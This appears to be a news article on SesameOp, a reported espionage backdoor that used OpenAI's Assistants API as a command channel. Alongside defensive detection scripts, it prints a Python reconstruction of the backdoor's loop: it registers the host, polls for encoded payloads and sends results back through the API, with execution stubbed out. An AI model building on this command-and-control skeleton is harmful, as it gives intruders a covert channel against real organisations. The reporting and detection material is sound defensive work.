Hackers Weaponized OpenAI Assistants API in Sophisticated Espionage Campaign

The420 Web Desk

In a rare intersection of artificial intelligence and cyber-espionage, Microsoft has uncovered a sophisticated hacking campaign that weaponized OpenAI’s Assistants API as a covert communication channel. The operation, codenamed SesameOp, represents a new frontier in how state-linked or advanced threat actors are blending legitimate AI tools with malicious infrastructure.

A Hidden Channel Within Legitimate AI Systems

Microsoft’s security team revealed that the attackers behind SesameOp repurposed OpenAI’s Assistants API — typically used for creating custom AI agents — to establish communication between their command-and-control (C&C) servers and a stealthy backdoor deployed on targeted systems.

The operation, described by Microsoft as “highly persistent and espionage-oriented,” enabled the attackers to maintain access to compromised environments for months. By disguising their traffic as ordinary API queries, the group effectively hid in plain sight, evading traditional network detection tools.

The malware’s commands were routed through compromised Visual Studio processes, which were coerced into loading malicious libraries via a technique known as .NET AppDomainManager injection. The attackers then used the hijacked processes to manage infected devices remotely, a design geared toward long-term persistence.
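
Defenders can hunt for this technique at the configuration layer: AppDomainManager injection is typically enabled through an application .config file whose runtime section names a rogue manager assembly. The Python sketch below is a heuristic illustration, not Microsoft’s published detection logic; it scans a directory tree for config files declaring the standard appDomainManagerAssembly or appDomainManagerType elements.

```python
import os
import re
import sys

# .NET AppDomainManager injection is usually switched on through an
# application .config file whose <runtime> section declares a custom
# appDomainManagerAssembly / appDomainManagerType. Flag any config
# file containing those elements for manual review.
SUSPICIOUS = re.compile(r"appDomainManager(Assembly|Type)", re.IGNORECASE)

def scan(root: str) -> None:
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".config"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    if SUSPICIOUS.search(fh.read()):
                        print(f"[!] possible AppDomainManager injection: {path}")
            except OSError:
                pass  # unreadable file; skip it

if __name__ == "__main__":
    # Default to the Visual Studio install tree mentioned above; any
    # root directory can be passed as the first argument.
    scan(sys.argv[1] if len(sys.argv) > 1 else r"C:\Program Files\Microsoft Visual Studio")
```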

Inside the ‘SesameOp’ Backdoor

At the core of the attack was a loader saved in the system’s temporary directory as OpenAIAgent.Netapi64, a dynamic link library (DLL) that functioned as a delivery mechanism for the backdoor.
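
The loader’s filename is itself a usable indicator of compromise. A minimal check, assuming only the temporary-directory location described above:

```python
import os
import tempfile

# Filename taken from Microsoft's SesameOp write-up; the location
# mirrors the report's description of the system temp directory.
IOC_NAME = "OpenAIAgent.Netapi64"

candidate = os.path.join(tempfile.gettempdir(), IOC_NAME)
if os.path.exists(candidate):
    print(f"[!] SesameOp loader indicator found: {candidate}")
else:
    print("No loader indicator in the default temp directory.")
```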

Once installed, the malware connected to OpenAI’s infrastructure, querying the attacker’s vector store to identify hostnames of infected machines. If a hostname wasn’t found, the backdoor created a new entry — effectively registering the compromised system within the attacker’s OpenAI account.
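
Microsoft has not released the backdoor’s code, but the registration step it describes maps onto ordinary vector-store calls in OpenAI’s official Python SDK. The sketch below is a reconstruction under that assumption, not the actor’s actual implementation:

```python
import socket

from openai import OpenAI  # official SDK; reads OPENAI_API_KEY from the environment

# Reconstruction of the registration step described above: look up this
# machine's hostname among the account's vector stores and create an
# entry if it is missing. Recent SDK releases expose vector stores at
# client.vector_stores (older ones used client.beta.vector_stores).
client = OpenAI()
hostname = socket.gethostname()

known = {store.name for store in client.vector_stores.list()}
if hostname not in known:
    client.vector_stores.create(name=hostname)  # "register" the compromised host
```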

The malicious agent then fetched a list of “Assistants” — each representing a separate instruction set — from the attacker’s account. These Assistants included identifiers, descriptions, and instruction parameters used to send encoded payloads.

According to Microsoft, the backdoor recognized three types of descriptions: Sleep, Payload, and Result. The first two directed the malware to wait or execute commands; the third transmitted the output back to OpenAI as a “message,” completing a full feedback loop within the API itself.
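
Taken together, the loop the report describes can be approximated in a few lines against the public Assistants API. Everything below is a hedged reconstruction: the Sleep/Payload/Result convention comes from Microsoft’s write-up, while the base64 encoding, the placement of parameters in the instructions field, and the run_payload stub are illustrative assumptions.

```python
import base64
import time

from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def run_payload(data: bytes) -> bytes:
    # Stub: the real backdoor would execute the decoded command here.
    return b"(execution intentionally omitted)"

# Each Assistant in the attacker's account acts as one queued command;
# its description field selects the command type.
for assistant in client.beta.assistants.list():
    kind = (assistant.description or "").lower()
    if kind == "sleep":
        time.sleep(int(assistant.instructions or "0"))  # dwell before polling again
    elif kind == "payload":
        output = run_payload(base64.b64decode(assistant.instructions or ""))
        # Report results back through the same API as a thread message,
        # closing the feedback loop the article describes.
        thread = client.beta.threads.create()
        client.beta.threads.messages.create(
            thread_id=thread.id,
            role="user",
            content=base64.b64encode(output).decode(),
        )
```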

Microsoft’s Response and OpenAI’s Action

Microsoft’s investigation traced the malicious behavior to a compromised API key linked to an OpenAI account believed to have been used by the threat actor. Once notified, OpenAI disabled both the key and the associated account, effectively cutting off the communication channel.

In a joint disclosure, Microsoft noted that while the incident exploited no vulnerability in OpenAI’s platform, it underscores a growing concern: the hijacking of legitimate AI services as infrastructure for covert cyber operations.

OpenAI confirmed that the affected API key had been disabled and announced plans to deprecate the Assistants API by August 2026, signaling a shift toward tighter security and abuse detection measures across its ecosystem.

AI’s New Frontier: Tool or Threat

By embedding their communication within legitimate AI workflows, the attackers effectively used OpenAI’s platform as a proxy for command relay, bypassing traditional defense mechanisms that focus on suspicious domains or encrypted tunnels.

Security analysts warn that as AI platforms become more deeply integrated into enterprise software, their APIs may present new opportunities for abuse — not by exploiting vulnerabilities, but by manipulating functionality for stealth and persistence.
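
In practice, that means connections to well-known AI endpoints can no longer be treated as implicitly benign. One simple audit, sketched here with the third-party psutil library and a purely illustrative process allowlist, lists which local processes currently hold connections to an AI API endpoint:

```python
import socket

import psutil  # third-party: pip install psutil

# Illustrative allowlist of processes expected to talk to the endpoint;
# a real deployment would source this from policy, not a hardcoded set.
ALLOWED = {"python.exe", "chrome.exe"}
ENDPOINT = "api.openai.com"

endpoint_ips = {info[4][0] for info in socket.getaddrinfo(ENDPOINT, 443)}

for conn in psutil.net_connections(kind="tcp"):
    if conn.raddr and conn.raddr.ip in endpoint_ips and conn.pid:
        try:
            name = psutil.Process(conn.pid).name()
        except psutil.NoSuchProcess:
            continue  # process exited between enumeration and lookup
        if name not in ALLOWED:
            print(f"[?] unexpected process talking to {ENDPOINT}: {name} (pid {conn.pid})")
```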

In Microsoft’s view, SesameOp represents “a landmark in adversarial innovation,” a chilling reminder that even the architectures designed to power next-generation intelligence can, in the wrong hands, serve as the backbone of deception.
